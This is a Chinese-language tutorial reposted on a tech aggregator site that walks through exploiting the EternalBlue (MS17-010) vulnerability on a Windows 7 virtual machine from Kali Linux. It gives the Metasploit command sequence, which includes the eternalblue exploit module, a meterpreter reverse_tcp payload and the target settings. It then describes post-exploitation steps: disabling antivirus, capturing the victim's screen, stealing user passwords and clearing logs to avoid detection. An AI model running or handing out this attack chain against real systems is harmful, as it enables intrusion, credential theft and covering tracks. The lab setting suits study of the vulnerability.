IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> 永恒之蓝漏洞攻击 -> 正文阅读

[网络协议]永恒之蓝漏洞攻击

win7虚拟机? ? ? ? ip

kali ip:

?采用nat的桥接模式:保证kali和win7能够通信

? ??nmap -sS -A? ? ? ? ? win7ip? ??(查看攻击对象win7所开放的所有端口)

msfconsole

(启动渗透框架)? 看到某个图案的这个渗透框架就运行了?

使用方法
????进入框架:msfconsole
????使用search命令查找相关漏洞:?search??ms17-010
????使用use进入模块:??use?exploit/windows/smb/ms17_010_eternalblue???
????使用info查看模块信息:?info?
????设置攻击载荷:set?payload?windows/x64/meterpreter/reverse_tcp
????查看模块需要配置的参数:show?options
????设置参数:set??RHOST??192.168.125.138
????攻击:exploit?/??run?
????后渗透阶段?

msfconsole?(查看ms17_010模块工具)

? ? ? 选择攻击模块:

这里可以得到两个工具,其中auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块,探测主机是否存在MS17_010漏洞

exploit/windows/smb/ms17_010_eternalblue是永恒之蓝攻击代码,一般配合使用,前者先扫描,若显示有漏洞,再进行攻击

use? ? ? ? ? ? ? ? ? exploit/windows/smb/ms17_010_eternalblue? (使用攻击模块)

使用模块

search payload? ? ? ? ? ? 搜索攻击载荷??payload(用来查看攻击对象返回信息)

??

设置攻击载荷? ??设置一个反弹信息(渗透攻击后的查看被攻击对象返回的信息)

set payload windows/x64/meterpreter/reverse_tcp?

show options (显示配置选项)

set Rhosts 攻击对象ip (设置被攻击主机地址)

?exploit? ?攻击? (攻击成功)

?攻击成功后可以对被攻击对象做一些操作:? 如关闭杀毒软件,进入终端,窃取屏幕,获取用户密码等

? ?关闭杀毒软件

窃取win7虚拟机的屏幕(屏幕共享)

结果:

?窃取win7的某个用户密码

窃取密码

? ? ? ? 渗透完成后,把需要的事干完了,清除日志(让win7发现不了)

  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章      下一篇文章      查看所有文章
加:2022-05-18 17:59:21  更:2022-05-18 18:00:20 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年5日历 -2024/5/19 8:18:13-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码